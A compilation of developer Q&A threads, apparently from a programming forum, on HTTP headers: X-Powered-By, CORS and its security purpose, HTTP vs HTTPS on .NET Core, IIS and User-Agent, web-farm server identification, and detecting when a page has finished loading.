Should I mess with the X-Powered-By header? - http

We're dealing with a legacy application that emitted an HTML blurb.
This HTML blurb was previously consumed by a web browser. Now we're
turning (a new instance of) it into a service and bringing it into
the intranet, inside the corporate firewall to be consumed by automated clients.
The code was returning HTTP Code 200 OK for Not Found situations,
alongside with some HTML explaining that the information could not be
found. We're considering returning a 404 Not Found code, but we want
some way to tell responses from the application and from the web server
apart (in case something gets misconfigured and the app can no longer
be reached).
Now we get to the meat of the question: should we change de X-Powered-By
header in the application? Do web servers and proxies respect that? We can
certainly test our current web server. But can we count on future server
updates/changes to respect this behaviour? Is this header governed by any
spec (RFC, etc.)?

Related

.NET Core 2 MVC - Not loading on HTTP, does load on HTTPS

I am working on an API in .NET core 2.
Everything works great when testing on https://localhost:44333, but when trying on http://localhost:44333 it does not work anymore. It just loads, and loads, and loads.... Nothing to see in the logs or anything like that.
The thing is, I need to get it working on HTTP because I want to try it on my phone in the app. So I use iisexpress-proxy to proxy it. This works when I can access the API on HTTP, but it doesn't work with HTTPS.
So therefor I need it to work with HTTP, but I have no idea why it does not work on HTTP. All my previous projects worked fine on HTTP and for some reason this one does not. I have looked in my startup if it might be forced or something like that, but I cannot find any...
You probably need more information than this, but I don't know what you need, so If you ask in the comments I will provide some more information/logs/code you name it.
The http version will be served on a different port. You'll need to look at your project properties to see which port it's being served on.
Just as some background:
There's effectively a client-side and server-side component to SSL. The http or https is the client-side component. That means the browser or other web client will either try to negotiate a secure socket or not, respectively. The server-side component is the port binding, which will either be a secure socket or not.
The forever-loading is because your client is trying to make a non-secure request, but the server's socket is attempting to negotiate SSL. It's like one person speaking Chinese and the other speaking Spanish. They're both communicating, but nothing gets accomplished.

How does CORS (Access-Control-Allow-Origin header) increase security?

I'm doing some work with this right now and I have to say, it makes no sense at all to me! Basically, I have some CDN server which provides css, images ect for a site. For whatever reason, in order for my browser to stop blocking those resources with a CORS error, I had to have that server (the CDN) add the Access-Control-Allow-Origin header. But as far as I can tell that does absolutely nothing to increase security. Shouldn't the page I request which references those cross-domain resources be telling the browser it's safe to get stuff from the other domain? If that were a malicious domain wouldn't it just have the Access-Control-Allow-Origin set to * so that sites load their malicious responses (you don't have to answer that because obviously they would)?
So can someone explain how this mechanism/feature provides security? As far as I can tell the implementors fucked up and it actually does nothing. The header should be required from the page which references/requests cross-domain resources rather than from that domain being requested.
To be clear; if I request a page at domain A it would make sense for the response to include the Access-Control-Allow-Origin header white listing resources from domain B (Access-Control-Allow-Origin:.B.com), however it makes no sense at all for domain B to effectively white list itself by providing the header; Access-Control-Allow-Origin: which is how this is currently implemented. Can anyone clarify what the benefit of this feature is?
If I have a protected resource hosted on site A, but also control sites B, C, and D, I may want to use that resource on all of my sites but still prevent anyone else from using that resource on theirs. So I instruct my site A to send Access-Control-Allow-Origin: B, C, D along with all of its responses. It's up to the web browser itself to honor this and not serve the response to the underlying Javascript or whatever initiated the request if it didn't come from an allowed origin. Error handlers will be invoked instead. So it's really not for your security as much as it's an honor-system (all major browsers do this) access control method for servers.
Primarily Access-Control-Allow-Origin is about protecting data from leaking from one server (lets call it privateHomeServer.com) to another server (lets call it evil.com) via an unsuspecting user's web browser.
Consider this scenario:
You are on your home network browsing the web when you accidentally stumble onto evil.com. This web page contains malicious javascript that tries to look for web servers on your local home network and then sends their content back to evil.com. It does this by trying to open XMLHttpRequests on all local IP addresses (eg. 192.168.1.1, 192.168.1.2, .. 192.168.1.255) until it finds a web server.
If you are using an old web browser that isn't Access-Control-Allow-Origin aware or you have set Access-Control-Allow-Origin * on your privateHomeServer then your browser would happily retrieve the data from your privateHomeServer (which presumably you didn't bother passwording as it was safely behind your home firewall) and then handing that data to the malicious javascript which can then send the information on to the evil.com server.
On the other hand using an Access-Control-Allow-Origin aware browser and default web configuration on privateHomeServer (ie. not sending Access-Control-Allow-Origin *) your web browser would block the malicious javascript from seeing any data retrieved from privateHomeServer. So this way you are protected from such attacks unless you go out of your way to change the default configuration on your server.
Regarding the question:
Shouldn't the page I request which references those cross-domain
resources be telling the browser it's safe to get stuff from the other
domain?
The fact that your page contains code that is attempting to get resources from a particular server is implicitly telling the web browser that you believe the resources are safe to fetch. It wouldn't make sense to need to repeat this again elsewhere.
CORS makes only sense for Mashup content provider and nothing more.
Example: You are a provider of a embedded maps mashup service which requires a registration. Now you want to make sure that your ajax mashup map will only work for your registered users on their domains. Other domains should be excluded. Only for this reason CORS makes sense.
Another example: Someone misuse CORS for a REST-Service. The clever developer set up a ajax proxy and et voilĂ  you can access from every domain on that service.
Such a ajax proxy would make no sense for a mashup, on the other way the CORS makes no sense for REST-Services, because you could bypass the restriction with a simple http-client.

What happens when a HTTP request uses different browser headers?

I'm trying to understand how an IIS server handles different browsers in the header of an HTTP request.
The situation is that I have some load tests set up that fire off HTTP requests to an IIS server, constructing them and sending them over the wire. My code allows me to specify the browser in the header, but I'm not sure what that would actually change.
So what does IIS do with that particular information in the header?
As far as i am aware IIS doesn't actually do anything with the header.
You can create rules to explicitly handle a type of browser, this is pretty useful if you block traffic from countries but you still want to allow bots for example.
Its useful to also have this information in Log Files too

find which server in a web farm the web method got executed?

This question is a consequence of the following question: determining which server (in a web farm) the asp.net ajax request came from?
The problem is that we commonly use automatically generated proxy classes to communicate with the web method (which may be part of asmx/wcf service). When we receive the response from the web services server, how do we know which server it got processed from?
We receive the response from the server side code which is executing (mostly). When its a script service (which can be called via javascript) its another case altogether.
How can we read the response headers once the web service returns?
Am I constrained to build my own proxy classes to solve this problem?
One way. Its not the best way but it will do until something new comes about. If you have a tool like fiddler/burp, you can inspect the response headers. So we must configure the IIS to set the response headers appropriately.
By default they are configured to output something like X-ASP.NET...a good idea would be to add the server name to that...

Is it correct to say that a web browser always knows when a web page is completely loaded?

A browser sends a GET request for a static web page to a server. The server sends back HTTP OK response with the HTML page in the HTTP body. Looking at the Content-Length field or looking for the terminating chunk or some other delimiter for some other encoding the browser can know if it has received the web page and subsequently all its embedded objects (images etc.). Is it correct to say that in this case the browser always knows when a web page has completely loaded and that it will see no further network traffic?
Now if the page is dynamic (lets say facebook or gmail), where you might receive notifications or parts of the page gets updated using AJAX or javascript running in the background, here also the browser should know when the page has loaded. What if the server is pushing some updates to the client. Is it possible in this scenario for the browser to know when it has received the full update?
So, is there any scenario in which a browser doesn't know when it has fully received the data (static or dynamic) it has requested from a web server or push-based updates the server is forwarding to it?
I can only imagine (for the static case) the one scenario when Content-Length is not set. It's not mandatory to send it for the server.
Potentially, of course, in a page containing scripts, one could also have other scenarios where the script loads bits and pieces one by one with delays (including the AJAX scenario you mentioned). This way the browser would not know in advance either. In such a case it would know "for the moment" that the page has loaded completely, but the next action from the script would invalidate that assertion again.
You do not need AJAX to get in a situation where not all elements in the page are loaded even after the page itself has been loaded. A little javascript is all that you need (been a while since I last worked with JS, there might be some syntax errors)
<img id="dyn_image" src="/not_clicked.gif">
<input type="button" onclick="javascrit:document.get("dyn_image").src="/clicked.gif">
There are cases when the server uses some kind of push technology, for example Comets. In this case a request (generally Ajax request) is sent, without receiving any response (obvoiusly no HTTP headers as well), but leaving the TCP connection open. This may take long time, but still may be considered as a sub-case of Ajax calls.
The other case is HTML5's WebSocket technology. In a WebSocket the server side can push data to the client side without explicit request from the client side.
These two can be combined, so the answer to your question is: yes, there can be cases when you cannot predict that the network traffic is over or not. The common (in all cases) is that the client side must leave a channel open to the server.

Resources